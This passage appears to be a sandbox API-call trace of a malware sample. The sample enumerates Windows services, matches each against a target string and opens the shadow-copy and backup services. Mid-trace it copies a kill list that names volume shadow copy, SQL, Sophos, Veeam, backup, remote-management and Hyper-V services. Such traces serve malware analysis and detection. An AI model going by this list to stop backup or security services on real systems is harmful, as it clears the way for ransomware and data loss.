(lpFirst="FDResPub", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="fhsvc", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="FileCrypt", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="FileInfo", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="Filetrace", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="flpydisk", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="FltMgr", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="FontCache", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="vss") returned 0x0 [0152.259] StrStrIA (lpFirst="FrameServer", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="FsDepends", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="fvevol", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="gencounter", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="genericusbfn", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="GPIOClx0101", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="gpsvc", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="gupdate", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="gupdatem", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HdAudAddService", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HDAudBus", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HidBatt", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HidBth", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="hidi2c", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="hidinterrupt", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HidIr", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="hidserv", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HidUsb", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HomeGroupListener", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HpSAMD", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HTTP", lpSrch="vss") returned 0x0 [0152.260] StrStrIA (lpFirst="HvHost", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="hvservice", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="hwpolicy", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="hyperkbd", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="i8042prt", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iagpio", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iai2c", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iaStorAV", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iaStorV", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="ibbus", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="icssvc", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="IKEEXT", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="IndirectKmd", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="intelide", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="intelpep", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="intelppm", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="iorate", lpSrch="vss") returned 0x0 [0152.261] StrStrIA (lpFirst="IpFilterDriver", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="iphlpsvc", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="IPMIDRV", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="IPNAT", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="irda", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="IRENUM", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="irmon", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="isapnp", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="iScsiPrt", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="kbdclass", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="kbdhid", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="kdnic", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="KeyIso", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="KSecDD", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="KSecPkg", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="ksthunk", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="KtmRm", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="LanmanServer", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="lfsvc", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="LicenseManager", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="lltdio", lpSrch="vss") returned 0x0 [0152.262] StrStrIA (lpFirst="lltdsvc", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="lmhosts", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="LSI_SAS", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="LSI_SSS", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="LSM", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="luafv", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="MapsBroker", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="mausbhost", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="mausbip", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="megasas", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="megasas2i", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="megasr", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="mlx4_bus", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="MMCSS", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="Modem", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="monitor", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="mouclass", lpSrch="vss") returned 0x0 [0152.263] StrStrIA (lpFirst="mouhid", lpSrch="vss") returned 0x0 [0152.264] StrStrIA (lpFirst="mountmgr", lpSrch="vss") returned 0x0 [0152.264] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="vss") returned 0x0 [0152.264] StrStrIA (lpFirst="mpsdrv", lpSrch="vss") returned 0x0 [0152.264] StrStrIA (lpFirst="MpsSvc", lpSrch="vss") returned 0x0 [0152.264] StrStrIA (lpFirst="MRxDAV", lpSrch="vss") returned 0x0 [0152.264] StrStrIA (lpFirst="mrxsmb", lpSrch="vss") returned 0x0 [0152.264] StrStrIA (lpFirst="mrxsmb10", lpSrch="vss") returned 0x0 [0152.264] StrStrIA (lpFirst="mrxsmb20", lpSrch="vss") returned 0x0 [0152.264] StrStrIA (lpFirst="MsBridge", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="MSDTC", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="Msfs", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="msgpiowin32", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="mshidkmdf", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="mshidumdf", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="msisadrv", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="MSiSCSI", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="msiserver", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="MSKSSRV", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="MsLldp", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="MSPCLOCK", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="MSPQM", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="MsRPC", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="MsSecFlt", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="mssmbios", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="MSTEE", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="MTConfig", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="Mup", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="mvumis", lpSrch="vss") returned 0x0 [0152.265] StrStrIA (lpFirst="NativeWifiP", lpSrch="vss") returned 0x0 [0152.266] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="vss") returned 0x0 [0152.266] StrStrIA (lpFirst="NcaSvc", lpSrch="vss") returned 0x0 [0152.266] StrStrIA (lpFirst="NcbService", lpSrch="vss") returned 0x0 [0152.266] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="vss") returned 0x0 [0152.267] OpenServiceA (hSCManager=0x3585be8, lpServiceName="vmicvss", dwDesiredAccess=0x2c) returned 0x3585990 [0152.267] QueryServiceStatusEx (in: hService=0x3585990, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0152.268] CloseServiceHandle (hSCObject=0x3585990) returned 1 [0152.268] OpenServiceA (hSCManager=0x3585be8, lpServiceName="VSS", dwDesiredAccess=0x2c) returned 0x3585850 [0152.269] QueryServiceStatusEx (in: hService=0x3585850, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0152.269] CloseServiceHandle (hSCObject=0x3585850) returned 1 [0152.697] OpenServiceA (hSCManager=0x3585be8, lpServiceName="wbengine", dwDesiredAccess=0x2c) returned 0x3585b20 [0152.698] QueryServiceStatusEx (in: hService=0x3585b20, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0152.698] CloseServiceHandle (hSCObject=0x3585b20) returned 1 [0152.711] GetProcessHeap () returned 0x3520000 [0152.712] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3586780 | out: hHeap=0x3520000) returned 1 [0152.713] CloseServiceHandle (hSCObject=0x3585be8) returned 1 [0152.734] SetEvent (hEvent=0x20c) returned 1 [0152.734] Sleep (dwMilliseconds=0x2710) [0163.178] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x3585850 [0163.183] EnumServicesStatusA (in: hSCManager=0x3585850, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x553fdc0, cbBufSize=0x24, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x553fdc0*(lpServiceName=0x0, lpDisplayName=0x0, ServiceStatus.dwServiceType=0x0, ServiceStatus.dwCurrentState=0x0, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 0 [0163.190] GetLastError () returned 0xea [0163.190] GetProcessHeap () returned 0x3520000 [0163.190] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xead4) returned 0x35f6428 [0163.193] EnumServicesStatusA (in: hSCManager=0x3585850, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x35f6428, cbBufSize=0xead4, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x35f6428*(lpServiceName="1394ohci", lpDisplayName="1394 OHCI Compliant Host Controller", ServiceStatus.dwServiceType=0x1, ServiceStatus.dwCurrentState=0x1, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x435, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 1 [0163.435] lstrcpyA (in: lpString1=0x553f9c0, lpString2="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" | out: lpString1="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v") returned="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" [0163.435] StrStrIA (lpFirst="1394ohci", lpSrch="vss") returned 0x0 [0163.435] StrStrIA (lpFirst="3ware", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="ACPI", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="AcpiDev", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="acpiex", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="acpipagr", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="AcpiPmi", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="acpitime", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="AdobeARMservice", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="ADP80XX", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="AFD", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="ahcache", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="AJRouter", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="ALG", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="AmdK8", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="AmdPPM", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="amdsata", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="amdsbs", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="amdxata", lpSrch="vss") returned 0x0 [0163.436] StrStrIA (lpFirst="AppID", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AppIDSvc", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="Appinfo", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="applockerfltr", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AppMgmt", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AppReadiness", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AppVClient", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AppvStrm", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AppvVemgr", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AppvVfs", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AppXSvc", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="arcsas", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AsyncMac", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="atapi", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AudioEndpointBuilder", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="Audiosrv", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="AxInstSV", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="b06bdrv", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="BasicDisplay", lpSrch="vss") returned 0x0 [0163.437] StrStrIA (lpFirst="BasicRender", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="bcmfn", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="bcmfn2", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="BDESVC", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="Beep", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="BFE", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="BITS", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="bowser", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="BrokerInfrastructure", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="Browser", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="BthAvrcpTg", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="BthHFEnum", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="bthhfhid", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="BthHFSrv", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="BTHMODEM", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="bthserv", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="buttonconverter", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="CAD", lpSrch="vss") returned 0x0 [0163.438] StrStrIA (lpFirst="CapImg", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="cdfs", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="CDPSvc", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="cdrom", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="CertPropSvc", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="cht4iscsi", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="cht4vbd", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="circlass", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="CldFlt", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="CLFS", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="ClickToRunSvc", lpSrch="vss") returned 0x0 [0163.439] StrStrIA (lpFirst="ClipSVC", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="clreg", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="CmBatt", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="CNG", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="cnghwassist", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="CompositeBus", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="COMSysApp", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="condrv", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="CoreMessagingRegistrar", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="CryptSvc", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="CSC", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="CscService", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="dam", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="DcomLaunch", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="defragsvc", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="DeviceAssociationService", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="DeviceInstall", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="DevQueryBroker", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="Dfsc", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="Dhcp", lpSrch="vss") returned 0x0 [0163.440] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="DiagTrack", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="Disk", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="dmvsc", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="dmwappushservice", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="Dnscache", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="DoSvc", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="dot3svc", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="DPS", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="drmkaud", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="DsmSvc", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="DsSvc", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="DusmSvc", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="DXGKrnl", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="e1iexpress", lpSrch="vss") returned 0x0 [0163.441] StrStrIA (lpFirst="EapHost", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="ebdrv", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="EFS", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="EhStorClass", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="embeddedmode", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="EntAppSvc", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="ErrDev", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="EventLog", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="EventSystem", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="exfat", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="fastfat", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="Fax", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="fdc", lpSrch="vss") returned 0x0 [0163.442] StrStrIA (lpFirst="fdPHost", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="FDResPub", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="fhsvc", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="FileCrypt", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="FileInfo", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="Filetrace", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="flpydisk", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="FltMgr", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="FontCache", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="FrameServer", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="FsDepends", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="fvevol", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="gencounter", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="genericusbfn", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="GPIOClx0101", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="gpsvc", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="vss") returned 0x0 [0163.443] StrStrIA (lpFirst="gupdate", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="gupdatem", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HdAudAddService", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HDAudBus", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HidBatt", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HidBth", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="hidi2c", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="hidinterrupt", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HidIr", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="hidserv", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HidUsb", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HomeGroupListener", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HpSAMD", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HTTP", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="HvHost", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="hvservice", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="hwpolicy", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="hyperkbd", lpSrch="vss") returned 0x0 [0163.444] StrStrIA (lpFirst="i8042prt", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iagpio", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iai2c", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iaStorAV", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iaStorV", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="ibbus", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="icssvc", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="IKEEXT", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="IndirectKmd", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="intelide", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="intelpep", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="intelppm", lpSrch="vss") returned 0x0 [0163.445] StrStrIA (lpFirst="iorate", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="IpFilterDriver", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="iphlpsvc", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="IPMIDRV", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="IPNAT", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="vss") returned 0x0 [0163.446] StrStrIA (lpFirst="irda", lpSrch="vss") returned 0x0 [0163.446] StrStrIA 